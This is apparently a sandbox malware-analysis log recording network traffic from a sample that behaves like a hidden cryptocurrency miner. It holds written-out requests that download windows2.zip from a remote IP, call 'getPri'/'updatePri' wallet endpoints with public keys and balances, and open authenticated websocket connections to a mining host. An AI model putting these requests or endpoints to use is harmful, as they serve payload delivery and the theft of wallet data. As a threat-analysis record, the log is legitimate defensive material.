                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529500 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: KngXupv80UoejMuFIlqepg==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6M1VpaUhnWmpFQjdNNjRmOFlta1lhSkRwVUFRNXgyR25uckFCUFJNcEtZZVBURWRlQjZ3WVVDS0QyQlJiMk5zRGdmU0s5M1RnWGNyZVdDZzhwRHcyd0Z3VA==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529501 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: j6vtTw5Bu3zHrdEAvVh3Dw==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86YkNpZnM4YTJGOGdiNXNSendkN1JyaTJiWE5MZlllcUhzV0FQTWFyczZWWEVyUlV2cE51a1BGQ0JRbTM4eHVkWFNkNTFWS010SHYzcjRuQ3JBdEN0N3Vj
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529508 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: qRN+NG4Nxs/4uirJDFZciQ==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NHhZZFBiODlRbmpOSDY4WHZKWjhCTmVSY1JNNGQxd2I0UjYybkZ0TXFoa1VKN0xuV1Bad00xUW9EaTVINEdMV1doMkZEUXNyamNTYkJZWFBIdmY1R3FNWg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529508 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: X8Pr2Hwo0w5JM2/K0j4UOQ==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M3BuandoZUw2M1FEelliWmF6dENZQm1UUnV1cmJLUXpSdTc2djVCWWJtcjNUWW96MndVOG5XU3lkcHd2VUt2S0UyaHRCODJNRnVvTkFKU2JWcGpWdFJrbg==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529514 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: Ynt1PuqpG/6BQxTB/m8e8w==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NHViVDhjVmF1NWREaDhwaDJDMmpHV0FKS0p0VGk5Sm9vekxybzRQdVZIOFFvUHJaeWNFODFZZWE1cnZhb3RKVVpKdzlCNEV2ckZGdzNOUXpIQ0NNdW11Rg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529514 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: Njx82qrHiA3W9ov4hAzCKw==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NW1KWFBSRVR6YWdXaVFCOVVLakN4RVZnN3NBUllpbkdheG1RNUg1TUplY1g5aFg4TlhkV1JVd0NiMXdQZzJ5MUNtR3pTZEJUbkNqV3o1cGJwVGdlQW1TUQ==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529521 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 1GumYcukGPwro1eUNHrDMw==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6MjZpaXdzUmF6Sm9oZmdMZHJ0UWZvR2IyekFCU1BhcER6V3pUNzlVVWY5RWF4YjV5TlJ5NnNMS3FkY21SUHV0UWJXbnVTNnlxSnBnWWFjelFUNEpRajNuZg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529521 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: qK3WihSrquxN35r2ZCS5Lw==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M3BtanFTc1ljSk1CZEFaYnN5dkc3bUpYZVlFVW1ucGtkczlQanJtdzdTeFJmemRRWGRCcGJOM1M4OXBncXhBTmlreW9Ycm02YVlINDRndEo5Q3p1WDRkZA==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529527 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 0dWhl/NTdbOrVDaVKZ/Hdw==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6MkxWRGRZVThZUk1tUWpFMU1HSDZoVEw0ZXF1bjZUWTc2TXlFNWhXQlZqV2pGNlRrcHBLQm5BVVdvcXpCc21RZVdqakdjeHZURTRzYm9KOTNzeTNMMmNqMw==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529528 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: SgbzhYTM+TLQu0KGeek80g==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86dHdEaDJCMTVjTGZkcmtldkVwRjRTb2pzdlcxam8yY3prb3Y1S0FVSFpEUmIySkJhZmFQelozZ3JMNFFaN1Q4QWFZN0gyWVhUZ3Z0RmsyVlBGb2NQUmZx
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/getPri HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/getPri HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/updatePri?pub=4ACz7dexqbAN71zD5WANZLKDYQuhz8D4j6pdkmyKQ91Q&bal=0.04496249757&first=true HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/updatePri?pub=7KD5XxiuTcgebvuXysq3sFXGS4A2UZTkANkpjuZJEPro&bal=0.04497911667&first=true HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/getPri HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/getPri HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: unknownTCP traffic detected without corresponding DNS query: 43.199.41.35
                        Source: global trafficHTTP traffic detected: GET /miner/rewards?pubkey=4ACz7dexqbAN71zD5WANZLKDYQuhz8D4j6pdkmyKQ91Q HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /miner/rewards?pubkey=7KD5XxiuTcgebvuXysq3sFXGS4A2UZTkANkpjuZJEPro HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529460 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: j+ijabsuJbfoanaXa6e/wg==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M0RVYkdDNGczaGMxYVZ5OEJ4ZXpHWWhEbzVwdDVkeDZRd0dERjZyZEN2eEptMUpkQWVWaUs4ZzlIQUJSRVZWdW1aeG5KVnlqbmJ2Ym1uWTlvcEhKRnJQaw==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529460 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: Pa7nbnXbg02FFMyV6RJt6A==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6M2dKM1llU0szcnNQOUNoanltOW9xZXRhR2pZQzVQTEN3bzlnSEpDUEdIWlB1YkV0OHJ5dTZQMndjZE1CNUg1a054ZjRTSjV0aUpoQ25pNW1SNE5zVnB2Rw==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529467 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: kjCthDRqmFKGgW61X8+gcg==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NW9CMW91MzRpU2R3M2tpaEdUV1BEVXFIMm9wR2tpN2FiWEFvenhoUjU0MXpoZkZDTURLclFObWhTTmE3QVFjQlZ3SEw4c3RncGd6UXdlaTFxSjZLZXNNcg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529467 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: DOpCmHC46XhQJiGoEF5WHA==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NWRQaXo3TERyeXZQVmVibVBWUzRmbURCRjE4QVV5cWJLMThQR2FLVXJ5emFRUnFaY2pwZTZmZTZYZkVCdTQ0cEdFOGVaZjVDQ0hDRFJwUjZmRkVpc0dnVg==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529473 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 06+qmnMtCAEE2s2ywxV3ug==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86Mm1UTXlqSjZxVTlncUthVXhZTWZtYlZ1eEJ4RjNOaFVBako5TVpYa2NhRldqTXRuTFVxUXJqb0I5VzhZdGp5QWlTS1R1b1VtaU5FMUtUUnhUNkM1WlY0Rg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529473 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: ACuOhDY8i4K7DEpUKBlvYw==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6M3lmRFRWNkZlY1ZzYVJhbnpTcGRQVFlWelF0ZEVvbUZUREhhbUx4V2o4UWF6TktvZGlaU1pab0JoSnNNdHVIbWlZU3dKWWZMaXh3TkhkR2E5NVo5NEdxUg==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529480 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: uN1+11IrwDzGU8rnhMRxNQ==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M0ZVU2N6UjJndkt3OUZvZE1pbnJSWHd4YVI0THJVa2g1NjZOV2pSa0Z2ekM5a2VCVzhIOXBnR3FtcDhKcjhzQTVUclFCR0VFUXBjVFc2cDhCZUN5MktwSw==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529480 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: H7m8aVRHdQaFbrlh0idjiA==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6Y29jZUpGRnJWM1dUUXJEQWtOSjlBclZoeGJ0WWtWN2pyd1RMU1ZxRTJ4anJCcmcxZDlQRGltblVmUERORVptQlFob0JGSlQzVENLNkhTWUxSU2tqTWtM
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529486 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: TBZMZ12pMHBBoC4mQVa+yA==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NHNzd2k1aHROd3hCQzRkTTlYbnNteXdrOFY1Uk10S2czMzRtbm94Uzc4Rnp6WXo4TWdZc3RpeFZqYVlrZzJFbkx5d3NyYzZYQlYyUkRWSnJ0anN0QUhnVQ==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529486 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: nkGHFwCOnEgaFMiW/EcHhA==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6WGZhUXUzdExuQTFuNTdONUFaemdFSEdwY3F1Q0RlVkJudldBc3NaQUIyNFdkaGozMWh5Y3Rod3oyeERrOENCNE44TlkxU0dqeVBxbkg1VHVRRDR2eEdw
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529493 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: Jcg0jM88I6kJ8E206drpQg==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NWpvR210UEtUMWtyOE1RQmlNWTl4UzQyNFpUZXRHZFlNQUprMkJ2Y0o1eTlITlRmVkJTZmV0Uk5aOTVkaFl3Zml0OWdlS3BMYkZBNmpuclExVHc2dEQ0Zg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529493 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: fNEZjZj4duZrRnwSm600NQ==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NTVUU1k0NU00TW9RMVlWa29KSENmM2plcnloS0JSOHZpcHNpcmpld2RSaFJFcmdXNkNhWXVBOUJSeHpnNTFaUnBKZEY2clFKZUxzZ2tlbWZmcUhuVUhT
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529500 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: KngXupv80UoejMuFIlqepg==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6M1VpaUhnWmpFQjdNNjRmOFlta1lhSkRwVUFRNXgyR25uckFCUFJNcEtZZVBURWRlQjZ3WVVDS0QyQlJiMk5zRGdmU0s5M1RnWGNyZVdDZzhwRHcyd0Z3VA==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529501 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: j6vtTw5Bu3zHrdEAvVh3Dw==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86YkNpZnM4YTJGOGdiNXNSendkN1JyaTJiWE5MZlllcUhzV0FQTWFyczZWWEVyUlV2cE51a1BGQ0JRbTM4eHVkWFNkNTFWS010SHYzcjRuQ3JBdEN0N3Vj
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529508 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: qRN+NG4Nxs/4uirJDFZciQ==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NHhZZFBiODlRbmpOSDY4WHZKWjhCTmVSY1JNNGQxd2I0UjYybkZ0TXFoa1VKN0xuV1Bad00xUW9EaTVINEdMV1doMkZEUXNyamNTYkJZWFBIdmY1R3FNWg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529508 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: X8Pr2Hwo0w5JM2/K0j4UOQ==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M3BuandoZUw2M1FEelliWmF6dENZQm1UUnV1cmJLUXpSdTc2djVCWWJtcjNUWW96MndVOG5XU3lkcHd2VUt2S0UyaHRCODJNRnVvTkFKU2JWcGpWdFJrbg==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529514 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: Ynt1PuqpG/6BQxTB/m8e8w==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NHViVDhjVmF1NWREaDhwaDJDMmpHV0FKS0p0VGk5Sm9vekxybzRQdVZIOFFvUHJaeWNFODFZZWE1cnZhb3RKVVpKdzlCNEV2ckZGdzNOUXpIQ0NNdW11Rg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529514 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: Njx82qrHiA3W9ov4hAzCKw==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NW1KWFBSRVR6YWdXaVFCOVVLakN4RVZnN3NBUllpbkdheG1RNUg1TUplY1g5aFg4TlhkV1JVd0NiMXdQZzJ5MUNtR3pTZEJUbkNqV3o1cGJwVGdlQW1TUQ==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529521 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 1GumYcukGPwro1eUNHrDMw==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6MjZpaXdzUmF6Sm9oZmdMZHJ0UWZvR2IyekFCU1BhcER6V3pUNzlVVWY5RWF4YjV5TlJ5NnNMS3FkY21SUHV0UWJXbnVTNnlxSnBnWWFjelFUNEpRajNuZg==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529521 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: qK3WihSrquxN35r2ZCS5Lw==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M3BtanFTc1ljSk1CZEFaYnN5dkc3bUpYZVlFVW1ucGtkczlQanJtdzdTeFJmemRRWGRCcGJOM1M4OXBncXhBTmlreW9Ycm02YVlINDRndEo5Q3p1WDRkZA==
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529527 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 0dWhl/NTdbOrVDaVKZ/Hdw==authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6MkxWRGRZVThZUk1tUWpFMU1HSDZoVEw0ZXF1bjZUWTc2TXlFNWhXQlZqV2pGNlRrcHBLQm5BVVdvcXpCc21RZVdqakdjeHZURTRzYm9KOTNzeTNMMmNqMw==
                        Source: global trafficHTTP traffic detected: GET /v2/ws?timestamp=1732529528 HTTP/1.1Host: ec1ipse.meConnection: upgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: SgbzhYTM+TLQu0KGeek80g==authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86dHdEaDJCMTVjTGZkcmtldkVwRjRTb2pzdlcxam8yY3prb3Y1S0FVSFpEUmIySkJhZmFQelozZ3JMNFFaN1Q4QWFZN0gyWVhUZ3Z0RmsyVlBGb2NQUmZx
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /timestamp HTTP/1.1accept: */*host: ec1ipse.me
                        Source: global trafficHTTP traffic detected: GET /windows2.zip HTTP/1.1Host: 43.199.41.35:8080User-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/getPri HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/getPri HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/updatePri?pub=4ACz7dexqbAN71zD5WANZLKDYQuhz8D4j6pdkmyKQ91Q&bal=0.04496249757&first=true HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/updatePri?pub=7KD5XxiuTcgebvuXysq3sFXGS4A2UZTkANkpjuZJEPro&bal=0.04497911667&first=true HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/getPri HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficHTTP traffic detected: GET /admin-api/ore/wallet/getPri HTTP/1.1accept: */*host: 20.2.154.66:48080
                        Source: global trafficDNS traffic detected: DNS query: ec1ipse.me
                        Source: lcc333.exe, 00000002.00000003.2134241371.000002B936A36000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2134662926.000002B936A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                        Source: app_process.exe, 00000020.00000002.3354405808.0000031AF2040000.00000004.00001000.00020000.00000000.sdmp, app_process.exe, 00000023.00000002.3354289774.0000052DFE040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://20.2.154.66:48080/admin-api/ore/wallet/getPri
